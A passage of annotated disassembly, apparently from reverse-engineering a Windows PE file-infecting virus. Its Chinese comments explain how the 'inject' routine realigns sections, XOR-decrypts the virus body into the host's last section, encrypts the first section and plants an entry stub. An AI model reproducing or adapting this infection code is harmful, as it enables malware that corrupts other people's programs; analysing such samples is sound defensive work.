.text:00401517                 push    edi
.text:00401518                 lea     eax, [edi]
.text:0040151A                 mov     edi, eax
.text:0040151C                 mov     al, 2Eh
.text:0040151E                 stosb
.text:0040151F                 mov     al, 74h
.text:00401521                 stosb
.text:00401522                 mov     al, 65h
.text:00401524                 stosb
.text:00401525                 mov     al, 78h
.text:00401527                 stosb
.text:00401528                 mov     al, 74h
.text:0040152A                 stosb
.text:0040152B                 mov     al, 0
.text:0040152D                 stosb
.text:0040152E                 pop     edi             ; 重新写节的名称
.text:0040152F                 xor     edx, edx
.text:00401531                 mov     eax, ebx
.text:00401533                 mov     ebx, ss:filealign[ebp]
.text:00401539                 div     ebx
.text:0040153B                 or      edx, edx
.text:0040153D                 jnz     short loc_401544 ; 对齐函数
.text:0040153F                 mov     eax, [edi+8]
.text:00401542                 jmp     short loc_401565
.text:00401544 ; ---------------------------------------------------------------------------
.text:00401544
.text:00401544 loc_401544:                             ; CODE XREF: inject+14Bj
.text:00401544                 mov     eax, [edi+8]    ; 对齐函数
.text:00401547                 mov     ebx, ss:filealign[ebp]
.text:0040154D                 push    ebx
.text:0040154E                 xor     ecx, ecx
.text:00401550                 mov     edx, eax
.text:00401552
.text:00401552 loc_401552:                             ; CODE XREF: inject:loc_40155Cj
.text:00401552                 inc     ecx
.text:00401553                 shr     ebx, 1
.text:00401555                 or      ebx, ebx
.text:00401557                 jnz     short loc_40155C
.text:00401559                 dec     ecx
.text:0040155A                 jmp     short loc_40155E
.text:0040155C ; ---------------------------------------------------------------------------
.text:0040155C
.text:0040155C loc_40155C:                             ; CODE XREF: inject+165j
.text:0040155C                 jmp     short loc_401552
.text:0040155E ; ---------------------------------------------------------------------------
.text:0040155E
.text:0040155E loc_40155E:                             ; CODE XREF: inject+168j
.text:0040155E                 sar     eax, cl
.text:00401560                 shl     eax, cl
.text:00401562                 pop     ebx
.text:00401563                 add     eax, ebx
.text:00401565
.text:00401565 loc_401565:                             ; CODE XREF: inject+150j
.text:00401565                 mov     ebx, [edi+10h]
.text:00401568                 mov     [edi+10h], eax  ; 修改文件对齐大小
.text:0040156B                 sub     eax, ebx
.text:0040156D                 shr     eax, 0Ch
.text:00401570                 shl     eax, 0Ch
.text:00401573                 mov     ss:dword_4018CC[ebp], eax ; ???????????????
.text:00401573                                         ; 如果差值大于2……12次方就不变否则清0了
.text:00401579                 mov     eax, [edi+24h]
.text:0040157C                 or      eax, 0A0000020h ; 还原之前的属性
.text:00401581                 mov     [edi+24h], eax
.text:00401584                 mov     esi, [edi+0Ch]
.text:00401587                 add     esi, [edi+8]
.text:0040158A                 sub     esi, 0B33h
.text:00401590                 sub     esi, 7
.text:00401593                 push    esi             ; 原来的virtualsize
.text:00401594                 mov     esi, [edi+14h]
.text:00401597                 add     esi, [edi+8]
.text:0040159A                 sub     esi, 0B33h
.text:004015A0                 sub     esi, 7
.text:004015A3                 mov     edi, esi        ; 还原原来的pointtorawdata
.text:004015A5                 add     edi, ss:map_base[ebp]
.text:004015AB                 lea     esi, start[ebp]
.text:004015B1                 mov     ecx, 32h        ; 写入节内容
.text:004015B6                 rep movsb
.text:004015B8                 lea     esi, dword_401062[ebp]
.text:004015BE                 mov     ecx, 0B01h
.text:004015C3                 mov     bl, ss:byte_40165F[ebp]
.text:004015C9                 inc     bl
.text:004015CB                 xor     al, al
.text:004015CD                 mov     ss:byte_40165F[ebp], al
.text:004015D3
.text:004015D3 loc_4015D3:                             ; CODE XREF: inject+1ECj
.text:004015D3                 or      ecx, ecx
.text:004015D5                 jnz     short loc_4015D9
.text:004015D7                 jmp     short loc_4015E0
.text:004015D9 ; ---------------------------------------------------------------------------
.text:004015D9
解密病毒体（0B01h 字节，逐字节与 bl 异或）并写入目标文件扩展后的最后一个节
.text:004015D9 loc_4015D9:                             ; CODE XREF: inject+1E3j
.text:004015D9                 lodsb
.text:004015DA                 xor     al, bl          ; 异或解密
.text:004015DC                 stosb
.text:004015DD                 dec     ecx
.text:004015DE                 jmp     short loc_4015D3
.text:004015E0 ; ---------------------------------------------------------------------------
.text:004015E0
.text:004015E0 loc_4015E0:                             ; CODE XREF: inject+1E5j
.text:004015E0                 push    edi
.text:004015E1                 mov     esi, ss:point_to_rawdata[ebp]
.text:004015E7                 add     esi, ss:map_base[ebp]
.text:004015ED                 mov     edi, esi
.text:004015EF                 mov     ecx, ss:virtualsize[ebp]
.text:004015F5
.text:004015F5 loc_4015F5:                             ; CODE XREF: inject+20Ej
.text:004015F5                 or      ecx, ecx        ; 循环
.text:004015F7                 jnz     short loc_4015FB
.text:004015F9                 jmp     short loc_401602
.text:004015FB ; ---------------------------------------------------------------------------
.text:004015FB
.text:004015FB loc_4015FB:                             ; CODE XREF: inject+205j
.text:004015FB                 lodsb
.text:004015FC                 xor     al, bl
.text:004015FE                 stosb
.text:004015FF                 dec     ecx
.text:00401600                 jmp     short loc_4015F5 ; 加密第一个节
.text:00401602 ; ---------------------------------------------------------------------------
.text:00401602
.text:00401602 loc_401602:                             ; CODE XREF: inject+207j
.text:00401602                 pop     edi
.text:00401603                 mov     al, 0B8h
.text:00401605                 stosb
.text:00401606                 mov     eax, ss:entry_add[ebp]
.text:0040160C                 stosd
.text:0040160D                 mov     ax, 0D0FFh
.text:00401611                 stosw
.text:00401613                 mov     edi, ss:option_header[ebp]
.text:00401619                 pop     eax
.text:0040161A                 mov     [edi+10h], eax
.text:0040161D                 pop     eax
.text:0040161E                 mov     ebx, [edi+38h]
.text:00401621                 mov     eax, ss:dword_4018CC[ebp]
.text:00401627                 add     ebx, eax
.text:00401629                 mov     [edi+38h], ebx
.text:0040162C                 mov     eax, ss:map_base[ebp]
.text:00401632                 push    eax
.text:00401633                 mov     eax, ss:dword_4016FB[ebp]
.text:00401639                 call    eax
.text:0040163B                 mov     eax, ss:dword_4018A8[ebp]
.text:00401641                 push    eax
.text:00401642                 mov     eax, ss:dword_40170B[ebp]
.text:00401648                 call    eax
.text:0040164A                 mov     eax, ss:(dword_401899+3)[ebp]
.text:00401650                 push    eax
.text:00401651                 mov     eax, ss:dword_40170B[ebp]
.text:00401657                 call    eax
.text:00401659                 retn
.text:00401659 inject          endp
.text:00401659
